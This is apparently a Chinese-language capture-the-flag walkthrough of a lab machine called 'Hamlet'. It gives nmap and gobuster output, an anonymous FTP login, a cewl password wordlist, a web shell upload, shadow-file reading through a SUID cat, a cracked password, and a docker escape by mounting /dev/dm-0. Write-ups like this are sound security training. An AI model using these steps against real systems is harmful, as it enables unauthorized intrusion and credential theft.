Hamlet

端口扫描

root@ip-10-10-77-80:~/hamlet# nmap -sTCV -p 21,22,80,501,8000,8080 --min-rate 1000 10.10.136.28

Starting Nmap 7.60 ( https://nmap.org ) at 2023-10-06 04:51 BST
Nmap scan report for ip-10-10-136-28.eu-west-1.compute.internal (10.10.136.28)
Host is up (0.00028s latency).

PORT     STATE SERVICE    VERSION
21/tcp   open  ftp        vsftpd 3.0.3
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| -rwxr-xr-x    1 0        0             113 Sep 15  2021 password-policy.md
|_-rw-r--r--    1 0        0            1425 Sep 15  2021 ufw.status
| ftp-syst: 
|   STAT: 
| FTP server status:
|      Connected to ::ffff:10.10.77.80
|      Logged in as ftp
|      TYPE: ASCII
|      No session bandwidth limit
|      Session timeout in seconds is 300
|      Control connection is plain text
|      Data connections will be plain text
|      At session startup, client count was 2
|      vsFTPd 3.0.3 - secure, fast, stable
|_End of status
22/tcp   open  ssh        OpenSSH 7.6p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 a0:ef:4c:32:28:a6:4c:7f:60:d6:a6:63:32:ac:ab:27 (RSA)
|   256 5a:6d:1a:39:97:00:be:c7:10:6e:36:5c:7f:ca:dc:b2 (ECDSA)
|_  256 0b:77:40:b2:cc:30:8d:8e:45:51:fa:12:7c:e2:95:c7 (EdDSA)
80/tcp   open  http       lighttpd 1.4.45
|_http-server-header: lighttpd/1.4.45
|_http-title: Hamlet Annotation Project
501/tcp  open  tcpwrapped
8000/tcp open  http       Apache httpd 2.4.48 ((Debian))
|_http-open-proxy: Proxy might be redirecting requests
|_http-server-header: Apache/2.4.48 (Debian)
|_http-title: Site doesn't have a title (text/html).
8080/tcp open  http-proxy
| fingerprint-strings: 
|   FourOhFourRequest: 
|     HTTP/1.1 500 
|     Content-Type: application/json;charset=UTF-8
|     Date: Fri, 06 Oct 2023 03:51:35 GMT
|     Connection: close
|     {"timestamp":1696564296315,"status":500,"error":"Internal Server Error","exception":"org.springframework.security.web.firewall.RequestRejectedException","message":"The request was rejected because the URL contained a potentially malicious String "%2e"","path":"/nice%20ports%2C/Tri%6Eity.txt%2ebak"}
|   GetRequest: 
|     HTTP/1.1 302 
|     Set-Cookie: JSESSIONID=D6D0262F1DC8DF0DDCB36DE0D977D15A; Path=/; HttpOnly
|     X-Content-Type-Options: nosniff
|     X-XSS-Protection: 1; mode=block
|     Cache-Control: no-cache, no-store, max-age=0, must-revalidate
|     Pragma: no-cache
|     Expires: 0
|     X-Frame-Options: SAMEORIGIN
|     Location: http://localhost:8080/login.html
|     Content-Length: 0
|     Date: Fri, 06 Oct 2023 03:51:35 GMT
|     Connection: close
|   HTTPOptions: 
|     HTTP/1.1 302 
|     Set-Cookie: JSESSIONID=73618669873A8066F2B2FBA661278187; Path=/; HttpOnly
|     X-Content-Type-Options: nosniff
|     X-XSS-Protection: 1; mode=block
|     Cache-Control: no-cache, no-store, max-age=0, must-revalidate
|     Pragma: no-cache
|     Expires: 0
|     X-Frame-Options: SAMEORIGIN
|     Location: http://localhost:8080/login.html
|     Content-Length: 0
|     Date: Fri, 06 Oct 2023 03:51:35 GMT
|     Connection: close
|   RTSPRequest: 
|     HTTP/1.1 400 
|     Content-Type: text/html;charset=utf-8
|     Content-Language: en
|     Content-Length: 435
|     Date: Fri, 06 Oct 2023 03:51:35 GMT
|     Connection: close
|     <!doctype html><html lang="en"><head><title>HTTP Status 400 
|     Request</title><style type="text/css">body {font-family:Tahoma,Arial,sans-serif;} h1, h2, h3, b {color:white;background-color:#525D76;} h1 {font-size:22px;} h2 {font-size:16px;} h3 {font-size:14px;} p {font-size:12px;} a {color:black;} .line {height:1px;background-color:#525D76;border:none;}</style></head><body><h1>HTTP Status 400

21

存在 FTP 的匿名身份登陆我们可以从这里登陆, 我们可以从其中得到两个文件:

• password-policy.md : 密码策略, 告诉我们 密码全部小写 12-14
• ufw.status : 端口开放状态估计是内网的东西

root@ip-10-10-77-80:~/hamlet# ftp 10.10.136.28
Connected to 10.10.136.28.
220 (vsFTPd 3.0.3)
Name (10.10.136.28:root): anonymous
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> passive  # 需要开启被动模式
Passive mode on.
ftp> ls -al
227 Entering Passive Mode (10,10,136,28,197,89).
150 Here comes the directory listing.
drwxr-xr-x    2 0        114          4096 Sep 15  2021 .
drwxr-xr-x    2 0        114          4096 Sep 15  2021 ..
-rwxr-xr-x    1 0        0             113 Sep 15  2021 password-policy.md  
-rw-r--r--    1 0        0            1425 Sep 15  2021 ufw.status

80

root@ip-10-10-77-80:~/hamlet# gobuster dir -u http://10.10.136.28/ -w /usr/share/wordlists/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt -x php,txt,html
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url:            http://10.10.136.28/
[+] Threads:        10
[+] Wordlist:       /usr/share/wordlists/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt
[+] Status codes:   200,204,301,302,307,401,403
[+] User Agent:     gobuster/3.0.1
[+] Extensions:     php,txt,html
[+] Timeout:        10s
===============================================================
2023/10/06 04:54:07 Starting gobuster
===============================================================
/index.html (Status: 200)
/robots.txt (Status: 200)
/hamlet.txt (Status: 200)
/%7Echeckout%7E (Status: 403)
===============================================================
2023/10/06 04:55:17 Finished
===============================================================

访问界面, 我们可以从界面的内容中确定以下事情:

• 用户名 : ghost
• 作者对 hamlet 痴迷, 结合之前 FTP 的知识我们获取可以借此来创建密码文件

8000

root@ip-10-10-77-80:~/hamlet# gobuster dir -u http://10.10.136.28:8000/ -w /usr/share/wordlists/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt -x php,txt,html
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url:            http://10.10.136.28:8000/
[+] Threads:        10
[+] Wordlist:       /usr/share/wordlists/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt
[+] Status codes:   200,204,301,302,307,401,403
[+] User Agent:     gobuster/3.0.1
[+] Extensions:     php,txt,html
[+] Timeout:        10s
===============================================================
2023/10/06 04:58:07 Starting gobuster
===============================================================
/index.html (Status: 200)
/db (Status: 301)
/repository (Status: 301)
/server-status (Status: 403)
===============================================================
2023/10/06 05:04:24 Finished
===============================================================

根据题目的, 询问我们 michael 的密码, 我们可以基于上面的密码策略创建密码库进行测试 WebAnno Pentesting | Exploit Notes

root@ip-10-10-77-80:~/hamlet# cewl http://10.10.136.28/hamlet.txt | tr '[:upper:]' '[:lower:]' | awk 'length($0)>=12 && length($0)<=14' | sort -u > wordlist.txt

后渗透

www-data(docker)

访问我们上传的 Shell

www-data(docker) —> root(docker)

我发现在系统中存在一个 SUID 程序 cat#suid

我们可以使用此来读取 shadow 来进行破解密码 (这里你要使用最新版的 John 否则可能不太行) 这里我并没有解密出来, 因为自己的环境全部G了, 寻找后发现明文 murder

root(docker) —> root

如果此时查看 dev 目录你会发现其中存在一个 dm-0 我们可以将其挂载到本地

root@66505608bd11:/dev#  mkdir /mnt/mydevice
root@66505608bd11:/dev#  mount /dev/dm-0 /mnt/mydevice
root@66505608bd11:/dev# cd /mnt/mydevice/
root@66505608bd11:/mnt/mydevice# ls -al
total 4015224
drwxr-xr-x 24 root root       4096 Sep 15  2021 .
drwxr-xr-x  1 root root       4096 Oct  6 07:49 ..
drwxr-xr-x  2 root root       4096 Sep 15  2021 bin
drwxr-xr-x  2 root root       4096 Sep 15  2021 boot
drwxr-xr-x  2 root root       4096 Sep 15  2021 cdrom
drwxr-xr-x  4 root root       4096 Aug  6  2020 dev